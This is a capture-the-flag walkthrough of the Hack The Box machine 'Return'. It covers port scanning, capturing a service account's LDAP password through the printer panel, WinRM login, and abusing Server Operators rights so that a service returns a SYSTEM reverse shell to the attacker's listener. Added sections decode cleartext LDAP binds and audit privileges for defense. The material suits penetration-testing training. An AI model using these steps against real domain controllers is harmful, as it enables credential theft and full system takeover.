┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.108
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-18 01:00:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10|Vista|11|2012|2022|Longhorn|7|8.1|XP (93%)
OS CPE: cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows Server 2019 (93%), Microsoft Windows 10 2004 (90%), Microsoft Windows Vista SP1 (90%), Microsoft Windows 10 1709 - 1803 (89%), Microsoft Windows 10 1709 - 1909 (89%), Microsoft Windows 10 1809 - 2004 (89%), Microsoft Windows 11 21H2 (89%), Microsoft Windows 10 1703 (89%), Microsoft Windows Server 2012 (89%), Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-18T01:01:13
|_ start_date: N/A
|_clock-skew: 18m34s
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.108
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
389/udp open ldap
464/udp open|filtered kpasswd5
500/udp open|filtered isakmp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
Enumeration: SMB Port 139/445/tcp
crackmapexec shows that the hostname is PRINTER.return.local, and I need auth to get any additional information from SMB:
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.108
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970
┌──(kali💀kali)-[~]
└─$ rpcclient 10.10.11.108 -U ""
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(kali💀kali)-[~]
└─$ enum4linux -a 10.10.11.108
================================( Getting domain SID for 10.10.11.108 )================================
Domain Name: RETURN
Domain Sid: S-1-5-21-3750359090-2939318659-876128439
[+] Host is part of a domain (not a workgroup)
BURP:
Everything points to this site being written in PHP, including the page extensions and the response headers:
http://10.10.11.108
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.4.13
Date: Thu, 18 Jan 2024 03:05:37 GMT
Connection: close
Content-Length: 28274
WIRESHARK:
intercept and review packets
DIR BRUTE:
I’ll run feroxbuster against the site, and include -x php since I know the site is PHP as well as a lowercase wordlist since IIS is case-insensitive:
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.11.108
+ Server: Microsoft-IIS/10.0
+ /: Retrieved x-powered-by header: PHP/7.4.13.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
Shell as svc-printer
LDAP Credentials:
My first thought on seeing the settings.php page is that it’s populating the “Password” field for me. This could be a case where the actual password is being populated into this field, and it’s just being displayed as *. But looking in Firefox dev tools, it’s actually pre-filling that field with all *, not the password.
Request:
When I submit this form, it sends a POST to /settings.php. The POST body only has one argument:
The other three fields in the form are not even sent. If the page does anything with this input, the user can only change the host (or “ip”), and not the port, username, or password.
Watch Request:
I’ll change the hostname to my tun0 IP, and start nc listening on port 389. I’ll also start Wireshark. On clicking “Update”, there’s a connection at nc:
┌──(kali💀kali)-[~]
└─$ nc -lnvp 389
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.108] 59885
0*`%return\svc-printer
1edFg43012!!
It’s probably clear from just that what the username and password that it’s trying to authenticate, but Wireshark breaks it out more nicely:
svc-printer
1edFg43012!!
It’s an LDAP bindRequest, with the username return\svc-printer and the simple authentication (password) of “1edFg43012!!”.
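To show exactly what a network observer sees in that bindRequest, here is an added example (not code from the original writeup) that decodes the BER-encoded LDAP message and flags a cleartext simple bind; the sample bytes are reconstructed from the nc output above, and the alert function's tls flag is an assumed input from whatever captured the connection.

```python
# Added example, not from the original writeup: decode the LDAP BindRequest the
# printer panel sent to the listener. A simple bind carries the password as a
# cleartext OCTET STRING, which is why pointing the panel at any host leaks it.
# Bytes reconstructed from the nc output above ("0*`%return\svc-printer" ...).
SAMPLE_BIND = (
    b"\x30\x2a"                            # LDAPMessage SEQUENCE, length 42
    b"\x02\x01\x01"                        # messageID INTEGER 1
    b"\x60\x25"                            # BindRequest [APPLICATION 0], length 37
    b"\x02\x01\x03"                        # version INTEGER 3
    b"\x04\x12" b"return\\svc-printer"     # name LDAPDN, 18 bytes
    b"\x80\x0c" b"1edFg43012!!"            # authentication: simple [0], 12 bytes
)

def _tlv(buf, pos):
    """Read one BER tag-length-value starting at pos; returns (tag, value, next)."""
    tag, length, start = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: 0x8N then N length bytes
        n = length & 0x7f
        length = int.from_bytes(buf[start:start + n], "big")
        start += n
    return tag, buf[start:start + length], start + length

def parse_bind_request(msg):
    """Return the fields of an LDAP BindRequest, or None if msg is another op."""
    tag, body, _ = _tlv(msg, 0)
    if tag != 0x30:
        return None
    _, msg_id, pos = _tlv(body, 0)
    op_tag, op, _ = _tlv(body, pos)
    if op_tag != 0x60:
        return None
    _, version, pos = _tlv(op, 0)
    _, name, pos = _tlv(op, pos)
    auth_tag, cred, _ = _tlv(op, pos)
    simple = auth_tag == 0x80              # 0x80 = simple, 0xa3 = SASL
    return {"message_id": int.from_bytes(msg_id, "big"),
            "version": int.from_bytes(version, "big"),
            "name": name.decode(), "simple": simple,
            "password": cred.decode() if simple else None}

def cleartext_bind_alert(msg, tls=False):
    """Detection rule: a non-empty simple bind on a connection without TLS
    exposes a credential to anyone on the path; that is the finding here."""
    b = parse_bind_request(msg)
    return bool(b and b["simple"] and b["password"] and not tls)
```

The fix on the panel side is the same whichever host it binds to: use LDAPS or STARTTLS for the bind, and give the service account no rights beyond the directory lookup it needs.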
WinRM:
The obvious next step is to look at LDAP, but before that, I’ll check and see if these creds happen to give more direct access. They work for SMB:
┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-printer> cd Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
b0818d1--------------------------
Shell as SYSTEM
Enumeration:
This account has a few interesting privileges:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
There’s a bunch of stuff here that could lead to SYSTEM access. I’ve shown using SeBackupPrivilege to get arbitrary file read. SeMachineAccountPrivilege allows me to add a machine to the domain, and I could likely escalate there as well.
Groups:
This user is also in several groups:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
There may be others of interest, but Server Operators jumps out immediately. This group can do a lot of things:
A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer.
Default User Rights:
Allow log on locally: SeInteractiveLogonRight
Back up files and directories: SeBackupPrivilege
Change the system time: SeSystemTimePrivilege
Change the time zone: SeTimeZonePrivilege
Force shutdown from a remote system: SeRemoteShutdownPrivilege
Restore files and directories: SeRestorePrivilege
Shut down the system: SeShutdownPrivilege
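For the privilege and group listings above (whoami /priv and whoami /groups), here is an added example (not code from the original writeup) that parses whoami's fixed-width tables and flags the rights a service account on a domain controller should not hold; the sample tables are constructed from rows on this page, and the risky-privilege and risky-group sets are this example's own assumptions about what to alert on.

```python
import re

# Added example, not from the original writeup: the tables are constructed from
# rows on this page, laid out the way whoami prints them (fixed-width columns,
# one space apart, a '=' separator line as wide as each column).
def _table(header, widths, rows):
    fmt = " ".join("{:<%d}" % w for w in widths)
    lines = [fmt.format(*header), " ".join("=" * w for w in widths)]
    return "\n".join(lines + [fmt.format(*r) for r in rows])

WHOAMI_PRIV = _table(("Privilege Name", "Description", "State"), (29, 35, 7), [
    ("SeMachineAccountPrivilege", "Add workstations to domain", "Enabled"),
    ("SeLoadDriverPrivilege", "Load and unload device drivers", "Enabled"),
    ("SeBackupPrivilege", "Back up files and directories", "Enabled"),
    ("SeRestorePrivilege", "Restore files and directories", "Enabled"),
    ("SeChangeNotifyPrivilege", "Bypass traverse checking", "Enabled"),
])
ATTRS = "Mandatory group, Enabled by default, Enabled group"
WHOAMI_GROUPS = _table(("Group Name", "Type", "SID", "Attributes"), (42, 16, 12, 50), [
    ("Everyone", "Well-known group", "S-1-1-0", ATTRS),
    ("BUILTIN\\Server Operators", "Alias", "S-1-5-32-549", ATTRS),
    ("BUILTIN\\Pre-Windows 2000 Compatible Access", "Alias", "S-1-5-32-554", ATTRS),
    ("BUILTIN\\Remote Management Users", "Alias", "S-1-5-32-580", ATTRS),
])

def parse_whoami_table(text):
    """Split whoami's table on the '=' separator line, so a name containing
    spaces (or one exactly as wide as its column, followed by a single space,
    like the Pre-Windows 2000 group) is not broken apart."""
    header, sep, *rows = text.splitlines()
    spans = [(m.start(), m.end()) for m in re.finditer(r"=+", sep)]
    spans[-1] = (spans[-1][0], None)          # last column runs to end of line
    names = [header[a:b].strip() for a, b in spans]
    return [dict(zip(names, (r[a:b].strip() for a, b in spans))) for r in rows if r.strip()]

# Assumed audit policy: rights and built-in groups (Server Operators, Print
# Operators, Administrators) that should not be left on a service account on a DC.
RISKY_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege",
               "SeLoadDriverPrivilege", "SeMachineAccountPrivilege"}
RISKY_GROUP_SIDS = {"S-1-5-32-549", "S-1-5-32-550", "S-1-5-32-544"}

def audit(priv_text, group_text):
    """Return (enabled risky privileges, risky group memberships) to remediate."""
    privs = sorted(p["Privilege Name"] for p in parse_whoami_table(priv_text)
                   if p["State"] == "Enabled" and p["Privilege Name"] in RISKY_PRIVS)
    groups = [g["Group Name"] for g in parse_whoami_table(group_text)
              if g["SID"] in RISKY_GROUP_SIDS]
    return privs, groups
```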
Reverse Shell:
This user can modify, start, and stop services, so I’ll abuse this by having it run nc64.exe to give a reverse shell. Cube0x0 has a nice post that includes many privesc techniques, including this one.
Typically, I would want to get a list of services that this account can modify, but it seems this user doesn’t have access to the Service Control Manager:
It works! I’ll try to stop the service, but it’s not started. Then I’ll start it:
*Evil-WinRM* PS C:\Users\svc-printer\Downloads> sc.exe stop VSS
[SC] ControlService FAILED 1062:
The service has not been started.
┌──(kali💀kali)-[~/Desktop/6. Web Shells]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.108] 53764
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Administrator\Desktop